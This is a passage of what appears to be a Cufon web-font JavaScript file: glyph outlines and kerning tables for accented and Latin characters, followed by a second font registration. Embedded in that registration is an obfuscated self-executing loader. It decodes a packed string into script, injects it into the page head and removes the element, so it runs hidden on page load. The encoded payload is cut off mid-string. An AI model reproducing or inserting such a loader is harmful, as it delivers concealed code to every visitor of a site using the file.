":"24,0r0,-196r38,0r0,196r-38,0xm57,-277r61,52r-39,0r-35,-27r-36,27r-39,0r62,-52r26,0","w":86},"\u00ef":{"d":"24,0r0,-196r38,0r0,196r-38,0xm25,-275r0,49r-36,0r0,-49r36,0xm98,-275r0,49r-36,0r0,-49r36,0","w":86},"\u00ec":{"d":"24,0r0,-196r38,0r0,196r-38,0xm-6,-288r86,48r-11,23r-88,-44","w":86},"\u00f1":{"d":"24,0r0,-196r36,0r0,30v9,-20,31,-36,66,-36v108,0,73,108,79,202r-38,0v-6,-68,24,-166,-51,-166v-77,0,-49,97,-54,166r-38,0xm45,-255v31,-36,92,17,125,-12r14,25v-31,36,-92,-16,-125,13","w":228,"k":{"v":12,"y":12,"\u00fd":12,"\u00ff":12,"u":5,"\u00fa":5,"\u00fb":5,"\u00fc":5,"\u00f9":5}},"\u00f3":{"d":"13,-98v0,-52,39,-104,105,-104v66,0,104,51,104,104v0,53,-38,103,-104,103v-66,0,-105,-50,-105,-103xm51,-98v0,39,30,68,67,68v37,0,67,-29,67,-68v0,-39,-30,-68,-67,-68v-37,0,-67,29,-67,68xm73,-242r86,-48r13,28r-87,43","w":235,"k":{"v":10,"w":8,"y":9,"\u00fd":9,"\u00ff":9,",":8,".":9,"x":11}},"\u00f4":{"d":"13,-98v0,-52,39,-104,105,-104v66,0,104,51,104,104v0,53,-38,103,-104,103v-66,0,-105,-50,-105,-103xm51,-98v0,39,30,68,67,68v37,0,67,-29,67,-68v0,-39,-30,-68,-67,-68v-37,0,-67,29,-67,68xm131,-277r62,52r-40,0r-35,-27r-35,27r-40,0r62,-52r26,0","w":235,"k":{"v":10,"w":8,"y":9,"\u00fd":9,"\u00ff":9,",":8,".":9,"x":11}},"\u00f6":{"d":"13,-98v0,-52,39,-104,105,-104v66,0,104,51,104,104v0,53,-38,103,-104,103v-66,0,-105,-50,-105,-103xm51,-98v0,39,30,68,67,68v37,0,67,-29,67,-68v0,-39,-30,-68,-67,-68v-37,0,-67,29,-67,68xm99,-275r0,49r-36,0r0,-49r36,0xm172,-275r0,49r-36,0r0,-49r36,0","w":235,"k":{"v":10,"w":8,"y":9,"\u00fd":9,"\u00ff":9,",":8,".":9,"x":11}},"\u00f2":{"d":"13,-98v0,-52,39,-104,105,-104v66,0,104,51,104,104v0,53,-38,103,-104,103v-66,0,-105,-50,-105,-103xm51,-98v0,39,30,68,67,68v37,0,67,-29,67,-68v0,-39,-30,-68,-67,-68v-37,0,-67,29,-67,68xm76,-288r86,48r-11,23r-88,-44","w":235,"k":{"v":10,"w":8,"y":9,"\u00fd":9,"\u00ff":9,",":8,".":9,"x":11}},"\u00f5":{"d":"13,-98v0,-52,39,-104,105,-104v66,0,104,51,104,104v0,53,-38,103,-104,103v-66,0,-105,-50,-105,-103xm51,-98v0,39,30,68,67,68v37,0,67,-29,67,-68v0,-39,-30,-68,-67,-68v-37,0,-67,29,-67,68xm48,-255v32,-36,93,17,126,-12r14,25v-32,36,-92,-16,-126,13","w":235,"k":{"v":10,"w":8,"y":9,"\u00fd":9,"\u00ff":9,",":8,".":9,"x":11}},"\u0161":{"d":"116,-54v2,-40,-99,-31,-99,-88v0,-73,124,-87,131,-3r-37,0v0,-15,-10,-26,-29,-26v-18,0,-28,12,-28,25v11,44,100,21,100,88v0,38,-31,64,-70,64v-31,0,-69,-18,-71,-63r37,0v2,45,64,40,66,3xm9,-275r40,0r35,27r35,-27r39,0r-61,52r-26,0","w":167,"k":{"w":6,",":2,".":3}},"\u00fa":{"d":"205,-196r0,196r-35,0r0,-30v-9,20,-32,36,-67,36v-108,0,-73,-108,-79,-202r38,0v6,69,-24,167,52,167v77,1,47,-98,53,-167r38,0xm78,-242r85,-48r13,28r-87,43","w":229},"\u00fb":{"d":"205,-196r0,196r-35,0r0,-30v-9,20,-32,36,-67,36v-108,0,-73,-108,-79,-202r38,0v6,69,-24,167,52,167v77,1,47,-98,53,-167r38,0xm128,-277r61,52r-39,0r-35,-27r-35,27r-40,0r62,-52r26,0","w":229},"\u00fc":{"d":"205,-196r0,196r-35,0r0,-30v-9,20,-32,36,-67,36v-108,0,-73,-108,-79,-202r38,0v6,69,-24,167,52,167v77,1,47,-98,53,-167r38,0xm96,-275r0,49r-36,0r0,-49r36,0xm169,-275r0,49r-36,0r0,-49r36,0","w":229},"\u00f9":{"d":"205,-196r0,196r-35,0r0,-30v-9,20,-32,36,-67,36v-108,0,-73,-108,-79,-202r38,0v6,69,-24,167,52,167v77,1,47,-98,53,-167r38,0xm61,-288r86,48r-11,23r-88,-44","w":229},"\u00fd":{"d":"44,71r33,-77r-75,-190r40,0r54,143r55,-143r40,0r-107,267r-40,0xm64,-242r85,-48r13,28r-87,43","w":191,"k":{",":33,".":34,"a":9,"\u00e6":9,"\u00e1":9,"\u00e2":9,"\u00e4":9,"\u00e0":9,"\u00e5":9,"\u00e3":9,"e":9,"\u00e9":9,"\u00ea":9,"\u00eb":9,"\u00e8":9,"o":9,"\u00f8":9,"\u0153":9,"\u00f3":9,"\u00f4":9,"\u00f6":9,"\u00f2":9,"\u00f5":9,"r":3}},"\u00ff":{"d":"44,71r33,-77r-75,-190r40,0r54,143r55,-143r40,0r-107,267r-40,0xm77,-275r0,49r-36,0r0,-49r36,0xm150,-275r0,49r-36,0r0,-49r36,0","w":191,"k":{",":33,".":34,"a":9,"\u00e6":9,"\u00e1":9,"\u00e2":9,"\u00e4":9,"\u00e0":9,"\u00e5":9,"\u00e3":9,"e":9,"\u00e9":9,"\u00ea":9,"\u00eb":9,"\u00e8":9,"o":9,"\u00f8":9,"\u0153":9,"\u00f3":9,"\u00f4":9,"\u00f6":9,"\u00f2":9,"\u00f5":9,"r":3}},"\u017e":{"d":"5,0r0,-27r99,-140r-96,0r0,-29r138,0r0,30r-96,137r99,0r0,29r-144,0xm5,-274r40,0r35,27r35,-27r39,0r-61,52r-26,0","w":153},"\u00ad":{"d":"0,-121r99,0r0,37r-99,0r0,-37","w":98},"\u00a0":{"w":106}}});

Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"411,-402r-103,0v0,-42,-26,-74,-79,-73v-51,0,-79,34,-78,70v2,43,41,63,99,79v83,23,174,47,177,164v2,106,-86,178,-194,178v-86,0,-193,-49,-198,-173r103,0v7,123,185,109,185,7v0,-54,-42,-73,-139,-104v-76,-24,-137,-59,-137,-141v0,-103,84,-165,183,-165v75,0,173,37,181,158","w":466,"k":{"w":16,",":6,".":9}},{"d":"160,-800r240,133r-31,64r-243,-122","w":555},{"d":"653,-225r124,0v-46,135,-183,239,-351,239v-223,0,-387,-175,-387,-385v0,-203,157,-383,386,-383v199,0,317,141,353,243r-125,0v-24,-48,-99,-139,-229,-139v-157,0,-267,129,-267,279v0,154,112,281,268,281v143,0,212,-108,228,-135","w":811,"k":{",":9,".":9,"A":51}},{"d":"619,-740r0,740r-100,0r0,-95v-30,56,-91,111,-203,111v-171,0,-279,-132,-279,-289v0,-169,122,-287,277,-287v111,0,179,62,201,105r0,-285r104,0xm521,-275v-2,-107,-83,-188,-189,-188v-115,0,-191,88,-191,191v1,100,71,191,191,191v106,0,191,-86,189,-194","w":689},{"d":"189,0r-118,0r0,-740r118,0r0,312r319,0r0,-312r118,0r0,740r-118,0r0,-324r-319,0r0,324","w":698},{"d":"71,0r0,-740v233,8,396,-41,533,120v57,66,81,152,81,249v0,216,-117,371,-377,371r-237,0xm568,-369v0,-155,-78,-268,-253,-267r-126,0r0,532r125,0v174,0,254,-111,254,-265","w":724,"k":{"V":37,"W":14,"Y":53,",":61,".":56,"A":46}},{"d":"175,57v17,46,99,92,154,92v91,0,185,-67,185,-189r0,-56v-32,61,-98,112,-196,112v-163,0,-281,-124,-281,-286v0,-170,123,-290,281,-290v91,0,166,48,196,108r0,-92r104,0r0,481v0,95,-24,156,-64,202v-50,58,-135,99,-229,99v-154,0,-244,-90,-270,-181r120,0xm516,-269v0,-102,-69,-195,-187,-193v-103,2,-188,77,-188,190v0,102,73,191,188,191v109,-1,187,-81,187,-188","w":685},{"d":"181,0r-110,0r0,-740r162,0r230,573r227,-573r162,0r0,740r-110,0r3,-624r-245,624r-77,0r-245,-624","w":923},{"d":"424,14v-223,0,-386,-175,-386,-380v0,-233,179,-388,387,-388v221,0,388,171,388,384v0,213,-167,384,-389,384xm426,-650v-161,0,-271,130,-271,280v0,154,114,280,272,280v161,0,268,-135,268,-279v0,-145,-107,-281,-269,-281","w":851,"k":{"T":43,"V":47,"W":16,"Y":49,",":39,".":39,"A":47,"X":47}},{"d":"586,-278v11,171,-91,289,-256,292v-53,0,-128,-16,-179,-64v-72,-66,-81,-138,-81,-228r0,-462r118,0r0,462v-8,96,42,188,141,188v102,0,140,-91,140,-188r0,-462r117,0r0,462","w":656,"k":{",":29,".":29,"A":36}},{"d":"204,-544r0,130r-109,0r0,-130r109,0xm204,-130r0,130r-109,0r0,-130r109,0","w":297,"k":{" ":67}},{"d":"203,-544r0,130r-109,0r0,-130r109,0xm205,-131r-89,207r-85,0r64,-207r110,0","w":297,"k":{" ":72}},{"d":"569,-544r0,544r-98,0r0,-84v-26,56,-87,101,-184,100v-175,-1,-220,-128,-220,-241r0,-319r104,0r0,295v0,98,38,168,145,168v102,0,149,-66,149,-159r0,-304r104,0","w":637},{"d":"5,0r196,-283r-183,-261r126,0r121,187r120,-187r124,0r-182,261r197,283r-127,0r-132,-202r-133,202r-127,0","w":530,"k":{"a":31,"e":31,"o":31}},{"d":"202,-409v-96,0,-172,-75,-172,-173v0,-96,75,-172,172,-172v97,0,172,76,172,173v0,97,-75,172,-172,172xm202,-682v-57,0,-98,43,-98,102v0,55,41,99,98,99v56,0,99,-43,99,-101v0,-57,-42,-100,-99,-100xm594,14v-97,0,-173,-74,-173,-174v0,-96,75,-172,173,-172v96,0,172,76,172,173v0,98,-77,173,-172,173xm594,-259v-58,0,-100,43,-100,101v0,56,42,100,100,100v56,0,98,-43,98,-101v0,-58,-42,-100,-98,-100xm622,-740r-374,740r-78,0r374,-740r78,0","w":796},{"w":295,"k":{"T":86,"V":84,"W":40,"Y":100,"A":43}},{"d":"91,-629r0,-111r104,0r0,111r-104,0xm-3,125v83,1,94,-58,94,-131r0,-538r104,0r0,535v0,107,-14,206,-169,216v-9,1,-19,1,-29,1r0,-83","w":275},{"d":"68,198r0,-742r99,0r0,95v41,-65,111,-111,208,-111v187,0,275,156,275,291v0,154,-111,285,-274,285v-113,0,-180,-62,-204,-106r0,288r-104,0xm167,-271v-1,108,83,190,189,190v110,0,189,-85,189,-192v0,-89,-63,-190,-190,-190v-107,0,-188,83,-188,192","w":688,"k":{"y":23,",":22,".":24}},{"d":"380,113r0,88r-265,0r0,-941r265,0r0,87r-164,0r0,766r164,0","w":451},{"d":"320,-462v-99,0,-148,68,-148,155r0,307r-104,0r0,-740r104,0r0,272v32,-64,106,-92,177,-92v162,0,221,106,221,263r0,297r-105,0r0,-292v1,-103,-41,-170,-145,-170","w":636,"k":{"y":26,"u":14}},{"d":"475,-487v-2,-96,-72,-159,-189,-149r-101,0r0,636r-118,0r0,-740v139,1,366,-12,424,43v100,61,131,236,56,341v-38,53,-86,71,-143,81r174,275r-125,0r-203,-334v65,0,132,3,174,-32v35,-29,51,-73,51,-121","w":609,"k":{"V":14,"Y":18}},{"d":"68,0r0,-740r104,0r0,283v149,-200,476,-94,476,183v0,175,-124,290,-280,290v-93,0,-165,-45,-200,-110r0,94r-100,0xm353,-81v124,0,190,-97,191,-192v0,-106,-81,-190,-188,-190v-112,0,-188,87,-188,190v0,104,74,192,185,192","w":684,"k":{"v":19,"y":20,",":28,".":28}},{"d":"421,-746r0,81r-55,0v-53,0,-60,31,-60,88r0,198v0,82,-70,130,-96,145v42,11,96,55,96,133r0,199v0,60,7,88,60,88r55,0r0,82r-101,0v-71,0,-121,-42,-121,-133r0,-199v0,-72,-47,-102,-90,-117r0,-108v35,-5,90,-43,90,-123r0,-203v0,-91,50,-131,121,-131r101,0","w":496},{"d":"531,-544r-208,544r-104,0r-208,-544r109,0r151,414r151,-414r109,0","w":542,"k":{",":90,".":90,"a":28,"e":28,"o":28}},{"d":"294,-754v157,0,270,124,270,267v0,80,-31,141,-65,192r-202,295r-135,0r177,-253v-13,8,-45,19,-76,19v-118,0,-237,-92,-237,-251v0,-153,118,-269,268,-269xm294,-339v73,0,155,-53,154,-158v0,-88,-65,-153,-151,-153v-87,0,-153,68,-153,155v0,94,71,156,150,156"},{"d":"373,100r-303,-840r116,0r304,840r-117,0","w":559},{"d":"214,0r-200,-740r120,0r146,579r145,-579r89,0r147,580r144,-580r120,0r-204,740r-109,0r-143,-561r-143,561r-112,0","w":939,"k":{"y":24,"O":16,"u":41,",":106,".":106,"A":53,"h":8,"a":61,"e":63,"i":13,"o":63,"-":37,"r":29,":":24,";":36}},{"d":"123,198r90,-214r-208,-528r112,0r150,398r152,-398r112,0r-297,742r-111,0","w":532,"k":{",":91,".":94,"a":26,"e":26,"o":26,"r":8}},{"d":"622,-544r0,544r-104,0r0,-95v-38,73,-116,111,-202,111v-175,0,-279,-136,-279,-288v0,-166,121,-288,279,-288v108,0,177,60,202,112r0,-96r104,0xm329,-463v-114,0,-188,90,-188,193v1,81,58,189,190,189v138,0,224,-137,172,-270v-25,-63,-87,-112,-174,-112","w":691},{"d":"71,0r0,-740r386,0r0,104r-268,0r0,216r264,0r0,103r-264,0r0,317r-118,0","w":493,"k":{",":179,".":161,"A":67,"a":20,"e":20,"o":20}},{"d":"196,-342v69,0,156,70,218,70v39,0,64,-34,86,-66r29,96v-29,43,-64,80,-115,80v-77,0,-142,-70,-221,-70v-40,0,-69,23,-94,66r-28,-94v25,-47,66,-82,125,-82","w":600},{"d":"75,-665r0,-81r101,0v71,0,121,40,121,131r0,203v0,80,55,118,90,123r0,108v-43,15,-90,45,-90,117r0,199v0,91,-50,133,-121,133r-101,0r0,-82r55,0v53,0,60,-28,60,-88r0,-199v0,-78,73,-124,96,-135v-46,-16,-96,-61,-96,-143r0,-198v0,-57,-6,-88,-60,-88r-55,0","w":496},{"d":"70,100r303,-840r117,0r-303,840r-117,0","w":559},{"d":"68,-630r0,-110r104,0r0,110r-104,0xm68,0r0,-544r104,0r0,544r-104,0","w":240},{"d":"34,-219r117,0v8,111,86,133,125,133v66,0,123,-52,123,-118v0,-82,-70,-102,-165,-136v-58,-20,-187,-62,-187,-201v0,-138,117,-213,233,-213v95,0,214,52,223,204r-116,0v-8,-40,-26,-104,-111,-104v-60,0,-112,41,-112,104v0,72,56,88,174,134v93,37,178,86,178,206v0,120,-81,224,-239,224v-147,0,-241,-90,-243,-233","w":548,"k":{",":7,".":18}},{"d":"350,-504r0,202r201,0r0,101r-201,0r0,201r-100,0r0,-201r-201,0r0,-101r201,0r0,-202r100,0","w":600},{"d":"221,-750r114,0r0,1000r-114,0r0,-1000","w":555},{"d":"68,0r0,-740r104,0r0,740r-104,0","w":240},{"d":"157,-444r-81,0r0,-296r81,0r0,296","w":233},{"d":"188,-551r-116,0v5,-149,126,-203,218,-203v119,0,205,81,205,189v0,84,-53,131,-100,156v133,46,145,153,145,191v0,133,-111,232,-253,232v-77,0,-161,-32,-207,-95v-31,-44,-43,-96,-44,-137r119,0v4,72,58,128,135,128v84,0,132,-60,132,-134v0,-94,-90,-144,-204,-131r0,-89v93,10,160,-40,160,-105v0,-56,-35,-101,-92,-101v-70,0,-95,55,-98,99"},{"d":"297,14v-158,0,-273,-125,-271,-267v0,-80,32,-141,66,-192r202,-295r135,0r-177,253v13,-8,45,-19,76,-19v117,0,237,92,237,251v0,153,-118,269,-268,269xm295,-402v-71,0,-154,53,-153,159v0,88,66,153,151,153v88,0,154,-69,154,-155v0,-95,-72,-157,-152,-157"},{"w":295,"k":{"T":86,"V":84,"W":40,"Y":100,"A":43}},{"d":"281,-645v-70,0,-122,50,-122,132r-114,0v-4,-156,119,-240,241,-241v136,0,227,101,227,212v0,87,-60,142,-115,194v-70,67,-75,107,-76,144r-110,0v2,-68,24,-119,98,-192v52,-50,84,-84,84,-136v0,-63,-43,-113,-113,-113xm321,-130r0,130r-109,0r0,-130r109,0","w":567},{"d":"244,0r0,-263r-232,-477r128,0r163,366r163,-366r128,0r-232,477r0,263r-118,0","w":605,"k":{"v":42,"O":49,"u":74,",":136,".":136,"A":96,"a":102,"e":102,"i":23,"o":102,"p":63,"q":102,"-":109,":":47,";":56,"S":33}},{"d":"71,0r0,-740r105,0r0,411r213,-215r126,0r-242,239r249,305r-121,0r-225,-280r0,280r-105,0","w":535,"k":{"y":20,"a":38,"e":38,"o":38}},{"d":"68,0r0,-544r98,0r0,80v31,-64,88,-95,162,-96r0,104v-103,-2,-156,51,-156,162r0,294r-104,0","w":336,"k":{"v":-11,"y":-13,"u":-6,",":79,".":82,"h":-6,"k":-6,"l":-6,"x":6,"a":33,"e":31,"i":-6,"o":33,"c":33,"d":26,"g":24,"m":-6,"n":-6,"p":-6,"q":22,"t":-24,"z":-6,"-":48}},{"d":"204,-175r-68,175r-128,0r304,-740r107,0r299,740r-128,0r-70,-175r-316,0xm488,-270r-127,-333r-125,333r252,0","w":726,"k":{"v":52,"w":39,"y":46,"C":47,"G":47,"O":47,"Q":47,"T":71,"u":36,"U":36,"V":103,"W":53,"Y":96}},{"d":"36,-247r0,-242v0,-214,176,-265,259,-265v111,0,259,76,259,261r0,246v0,199,-164,261,-257,261v-98,0,-261,-64,-261,-261xm153,-493r0,249v0,84,54,154,142,154v80,0,141,-70,141,-154r0,-252v0,-57,-29,-154,-143,-154v-89,0,-140,71,-140,157"},{"d":"583,-165v-44,105,-134,181,-265,181v-178,0,-288,-143,-288,-287v0,-156,122,-289,287,-289v172,0,306,154,283,321r-465,0v10,189,272,218,340,74r108,0xm137,-320r360,0v-5,-72,-77,-151,-180,-151v-106,0,-175,77,-180,151","w":634,"k":{"v":24,"w":16,"y":21,",":8,".":11,"x":22}},{"d":"568,-508v0,155,-94,245,-279,237r-104,0r0,271r-118,0r0,-740r211,0v115,0,164,15,208,50v52,40,82,111,82,182xm455,-506v0,-134,-131,-135,-270,-130r0,261v138,4,270,6,270,-131","w":580,"k":{",":211,".":200,"A":86,"a":18,"e":18,"o":18}},{"d":"0,-335r274,0r0,103r-274,0r0,-103","w":274},{"d":"190,0r-182,-544r109,0r128,411r116,-379r87,0r118,379r126,-411r108,0r-181,544r-99,0r-117,-381r-114,381r-99,0","w":809,"k":{",":83,".":83,"a":23,"e":18,"o":23}},{"d":"650,-530v-45,-66,-121,-120,-224,-120v-140,0,-271,106,-271,278v0,252,269,354,442,227v45,-34,76,-81,87,-132r-319,0r0,-96r456,0v0,47,-8,111,-33,166v-68,147,-221,221,-361,221v-219,0,-389,-169,-389,-386v0,-221,175,-382,390,-382v159,0,302,96,355,224r-133,0","w":854,"k":{",":29,".":24,"A":47}},{"d":"71,0r0,-740r414,0r0,104r-296,0r0,210r292,0r0,103r-292,0r0,219r296,0r0,104r-414,0","w":537},{"d":"429,-300v3,-95,-33,-162,-125,-162v-94,0,-132,72,-132,164r0,298r-104,0r0,-544r98,0r0,77v23,-46,86,-93,165,-93v50,0,101,16,140,58v13,15,29,43,35,53v28,-58,98,-111,183,-111v50,0,106,14,146,55v48,49,60,101,60,205r0,300r-104,0r0,-296v0,-90,-29,-166,-127,-166v-88,0,-130,70,-130,162r0,300r-105,0r0,-300","w":960,"k":{"y":26,"u":14}},{"d":"165,-444r-81,0r0,-296r81,0r0,296xm321,-444r-82,0r0,-296r82,0r0,296","w":405},{"d":"204,-740r0,531r-108,0r0,-531r108,0xm204,-130r0,130r-108,0r0,-130r108,0","w":300},{"d":"49,-418r502,0r0,100r-502,0r0,-100xm49,-186r502,0r0,101r-502,0r0,-101","w":600},{"d":"48,-302r504,-223r0,110r-397,163r397,163r0,110r-504,-223r0,-100","w":600},{"d":"350,-740r-18,140r113,-85r34,63r-126,53r127,53r-37,65r-112,-86r19,139r-73,0r18,-140r-111,87r-37,-65r127,-54r-127,-52r35,-63r114,84r-19,-139r73,0","w":627},{"d":"500,125r-500,0r0,-50r500,0r0,50","w":500},{"d":"204,-131r-83,207r-90,0r63,-207r110,0","w":297,"k":{" ":128}},{"d":"127,-740r375,0r0,100r-284,0r-33,181v24,-16,58,-39,126,-39v161,0,246,135,246,250v0,127,-99,262,-267,262v-131,0,-246,-84,-266,-221r118,0v16,72,81,117,145,117v82,0,153,-70,153,-155v0,-84,-66,-155,-153,-155v-35,0,-88,11,-130,74r-96,-24"},{"d":"247,0r0,-640r-140,0r0,-100r258,0r0,740r-118,0"},{"d":"868,13v-93,0,-186,-31,-217,-64v-64,41,-141,65,-217,65v-238,0,-390,-187,-390,-382v0,-206,160,-386,387,-386v227,0,390,177,390,381v0,140,-62,214,-91,248v38,26,75,36,138,41r0,97xm311,-364v159,0,208,62,327,164v43,-44,66,-105,66,-173v0,-164,-124,-277,-273,-277v-155,0,-287,131,-257,311v30,-10,75,-25,137,-25xm566,-127v-69,-70,-156,-137,-267,-137v-50,0,-82,10,-108,21v58,124,175,153,243,153v57,0,107,-19,132,-37","w":873,"k":{",":-11}},{"d":"363,0r0,-136r-353,0r0,-88r351,-516r116,0r0,510r79,0r0,94r-79,0r0,136r-114,0xm131,-230r239,0r0,-367"},{"d":"10,0r256,-386r-236,-354r134,0r170,267r169,-267r133,0r-233,356r255,384r-134,0r-194,-301r-189,301r-131,0","w":668,"k":{"C":47,"O":47,"a":36,"e":36,"o":36}},{"d":"401,-249r-28,204r-73,0r28,-204r-107,0r-28,204r-75,0r29,-204r-122,0r8,-71r124,0r14,-102r-123,0r9,-72r124,0r26,-186r74,0r-26,186r107,0r26,-186r74,0r-26,186r129,0r-9,72r-131,0r-14,102r129,0r-8,71r-131,0xm338,-320r14,-102r-107,0r-14,102r107,0"},{"d":"289,0r-277,-740r122,0r214,596r215,-596r122,0r-279,740r-117,0","w":697,"k":{"y":12,"G":47,"O":47,"u":58,",":152,".":152,"A":103,"a":105,"e":105,"i":26,"o":105,"-":73,"r":51,":":47,";":61}},{"d":"204,-130r0,130r-109,0r0,-130r109,0","w":297,"k":{" ":128}},{"d":"71,0r0,-740r118,0r0,740r-118,0","w":261},{"d":"38,268r0,-116v109,-59,218,-204,218,-394v0,-185,-105,-332,-218,-393r0,-119v224,99,331,312,331,513v0,197,-110,419,-331,509","w":451},{"d":"79,0r0,-463r-74,0r0,-81r74,0r0,-37v0,-164,127,-172,204,-173r0,82v-35,1,-100,1,-100,96r0,32r100,0r0,81r-100,0r0,463r-104,0","w":291,"k":{",":50,".":50,"l":22,"a":24,"e":24,"f":22,"i":22,"o":24}},{"d":"132,-195v5,69,62,107,100,105v83,-5,102,-62,101,-141r0,-509r117,0r0,483v14,178,-78,271,-224,271v-43,0,-185,-20,-215,-166v-3,-13,-4,-28,-5,-43r126,0","w":522,"k":{"u":10,",":19,".":23,"A":38,"a":11,"e":11,"o":11}},{"d":"578,-449r110,0r-127,241r148,151r-72,70r-132,-136v-40,77,-97,137,-216,137v-146,0,-237,-99,-237,-211v0,-119,98,-181,164,-216v-50,-53,-85,-101,-85,-165v0,-97,80,-176,183,-176v104,0,181,79,181,173v0,99,-76,143,-132,173r128,130xm399,-582v0,-44,-33,-84,-85,-84v-48,0,-80,39,-80,82v0,51,39,86,68,117v61,-34,97,-59,97,-115xm435,-191r-154,-157v-82,41,-115,88,-115,142v0,66,53,120,127,120v74,0,109,-41,142,-105","w":741},{"d":"165,-412v-41,-23,-89,-73,-89,-151v0,-96,80,-191,219,-191v138,0,218,93,218,192v0,77,-47,127,-88,150v78,31,119,105,119,189v-1,135,-106,237,-249,237v-144,0,-250,-102,-250,-237v0,-83,41,-157,120,-189xm295,-657v-57,0,-104,45,-104,105v0,58,47,102,104,102v57,0,104,-44,104,-103v0,-59,-47,-104,-104,-104xm295,-358v-78,0,-132,63,-132,135v0,69,55,133,132,133v77,0,132,-64,132,-134v0,-71,-55,-134,-132,-134"},{"d":"178,0r0,-636r-170,0r0,-104r458,0r0,104r-170,0r0,636r-118,0","w":474,"k":{"w":62,"y":31,"O":43,"u":75,",":100,".":110,"A":71,"a":79,"e":79,"o":79,"c":77,"-":77,"r":48,"s":49,":":51,";":61}},{"d":"74,-375r173,-365r106,0r173,365r-114,0r-113,-272r-112,272r-113,0","w":600},{"d":"68,0r0,-544r98,0r0,84v26,-56,87,-101,184,-100v174,2,220,128,220,241r0,319r-105,0r0,-295v0,-98,-38,-168,-144,-167v-102,1,-149,65,-149,159r0,303r-104,0","w":636,"k":{"v":34,"y":32,"u":14}},{"d":"71,201r0,-88r164,0r0,-766r-164,0r0,-87r266,0r0,941r-266,0","w":451},{"d":"478,-648r-317,544r326,0r0,104r-469,0r0,-76r327,-560r-333,0r0,-104r466,0r0,92","w":499},{"d":"89,0r0,-740r118,0r0,350r271,-350r125,0r-288,369r317,371r-145,0r-280,-341r0,341r-118,0","w":630,"k":{"y":41,"O":38,"u":44,"a":46,"e":46,"o":46}},{"d":"292,-740v142,-5,232,71,232,190v0,78,-41,127,-94,155v128,41,135,150,135,183v-1,73,-36,130,-90,169v-86,62,-260,36,-404,43r0,-740r221,0xm411,-536v-8,-77,-44,-100,-128,-100r-94,0r0,203r97,0v74,6,131,-39,125,-103xm452,-219v-1,-83,-66,-115,-154,-115r-109,0r0,230v127,1,263,15,263,-115","w":599,"k":{"U":14,",":18,".":18,"A":30}},{"d":"74,0r0,-740r118,0r0,636r261,0r0,104r-379,0","w":458,"k":{"y":36,"O":49,"T":61,"V":101,"W":53,"Y":92,"o":28}},{"d":"327,-463v-107,0,-186,81,-186,191v0,112,82,191,186,191v91,0,148,-56,170,-110r107,0v-33,118,-140,207,-276,207v-178,0,-291,-137,-291,-288v0,-161,123,-288,286,-288v130,0,247,80,281,211r-107,0v-28,-73,-96,-114,-170,-114","w":637,"k":{"y":9,",":8,"h":8,"k":8,"l":8}},{"d":"54,0r0,-93r229,-215v71,-65,139,-121,139,-209v0,-84,-55,-133,-128,-133v-79,0,-124,66,-126,160r-113,0v2,-65,18,-124,58,-176v54,-71,139,-88,191,-88v147,0,237,104,235,229v-1,82,-35,142,-116,221r-208,204r327,0r0,100r-488,0"},{"d":"343,-811r0,92v95,17,147,89,149,177r-99,0v-9,-127,-188,-121,-188,1v0,73,60,92,147,122v92,32,157,99,157,190v0,87,-60,174,-166,198r0,98r-88,0r0,-98v-109,-13,-171,-103,-174,-194r108,0v5,72,56,111,109,111v59,0,103,-48,103,-104v0,-85,-82,-111,-160,-136v-56,-17,-143,-58,-143,-177v0,-108,74,-171,157,-188r0,-92r88,0"},{"d":"75,-740r442,0r0,92r-291,648r-129,0r298,-640r-320,0r0,-100"},{"d":"182,-740r384,563r-2,-563r114,0r0,740r-108,0r-387,-564r2,564r-114,0r0,-740r111,0","w":750},{"d":"327,15v-183,0,-290,-141,-290,-288v0,-145,107,-287,290,-287v183,0,290,142,290,288v0,146,-107,287,-290,287xm327,-462v-104,0,-186,81,-186,191v0,108,82,189,186,189v104,0,186,-81,186,-190v0,-109,-82,-190,-186,-190","w":655,"k":{"v":28,"w":23,"y":26,",":22,".":24,"x":31}},{"d":"619,-544r0,742r-104,0r0,-290v-24,45,-89,108,-205,108v-163,0,-273,-129,-273,-282v0,-170,117,-294,279,-294v110,0,174,58,203,109r0,-93r100,0xm331,-81v106,0,187,-84,189,-190v2,-106,-83,-193,-189,-192v-125,0,-189,99,-190,194v0,98,76,188,190,188","w":687},{"d":"413,-754r0,117v-108,59,-217,204,-217,394v0,185,104,332,217,393r0,118v-224,-98,-331,-311,-331,-512v0,-197,110,-419,331,-510","w":451},{"d":"14,0r0,-74r276,-389r-268,0r0,-81r383,0r0,82r-267,381r275,0r0,81r-399,0","w":427},{"d":"107,0r0,-463r-98,0r0,-81r98,0r0,-196r104,0r0,196r105,0r0,81r-105,0r0,463r-104,0","w":326,"k":{"a":27,"e":27,"o":27}},{"d":"48,-89r397,-164r-397,-162r0,-110r504,223r0,100r-504,223r0,-110","w":600},{"d":"657,-146r23,51v-83,85,-214,110,-276,110v-256,0,-387,-200,-387,-380v0,-206,158,-390,388,-390v189,0,349,129,349,321v0,168,-124,274,-213,274v-37,0,-81,-18,-90,-73v-64,112,-258,93,-257,-85v0,-119,89,-249,203,-249v59,0,89,30,103,70r16,-56r70,0r-64,242v-1,8,-9,35,-9,49v-2,33,22,39,39,39v53,0,138,-81,138,-210v0,-164,-136,-260,-282,-260v-183,0,-322,147,-322,329v0,140,97,317,317,317v87,0,188,-30,254,-99xm405,-504v-69,0,-139,86,-139,185v0,73,45,94,78,94v65,0,98,-56,112,-97v7,-22,25,-68,25,-98v-1,-50,-35,-84,-76,-84","w":770}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+378-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("NiE7Sg.=^Xo9N[0IdgKzWiWoUD.7Ego9UDBz^X%HE!$TF(=l;DMwEJ1JE=7G!s`IdUe0Wiy5XD1mFHrDq!j;!P01%H2oU[oyazr$S[;(.0j7~wM1~woE^PBM~i!p,Udu%X7;WlJoG[y),wajas%FW7F9mm0gmlF&!K29U!y,p>j3~lpPsgojNuy=G>cl,H.5Si0=N[WlNmjyGscT;w7l,HcTSw75,gj0Sgd=^[jHG